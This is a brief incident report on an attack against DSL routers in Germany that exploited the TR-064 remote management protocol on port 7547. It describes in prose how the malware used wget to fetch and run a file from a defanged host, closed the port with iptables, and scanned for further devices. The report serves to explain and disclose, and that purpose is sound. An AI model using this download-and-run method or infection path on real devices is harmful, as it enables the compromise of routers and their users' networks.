Yesterday a large number of DSL users in Germany started to report that they were having problems with their routers and that their internet connection speeds were very slow. As a result of the large number of DSL users having problems and technical studies, some findings were obtained.
It was determined that the remote management protocol, which allows DSL users to remotely connect to router interfaces, has been exploited.
This request is described in specification TR-064 of DSL CPE configuration methods.
In summary, the malware that takes advantage of the vulnerability on the linux-based router is configured to download and run the executable file named 1 from http://l.ocalhost[.]host to the /tmp directory with the wget tool. The ip address of the l.ocalhost.host host changed constantly during the day.
The relevant executable file, after running itself;
– It deletes itself from the file system and continues to work only on memory
– closing port 7547 with iptables
– Scans and infects other devices using TCP port 7547
However, the related malware saves itself in the /tmp directory and cannot write itself to the permanent file system. Therefore, when the router is restarted, it cannot continue its life.
